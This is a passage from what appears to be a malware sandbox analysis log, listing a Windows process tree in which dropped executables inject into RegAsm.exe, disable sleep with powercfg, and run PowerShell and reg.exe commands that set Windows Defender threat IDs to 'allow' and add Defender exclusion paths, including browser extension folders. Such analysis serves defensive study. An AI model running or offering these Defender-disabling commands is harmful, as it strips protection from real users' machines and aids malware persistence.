- C:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exe
  C:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4880

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1784

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3672
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4404
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:708
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3056
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1448

C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe Ij /spoadidY 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6096
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5224
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5860
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3068
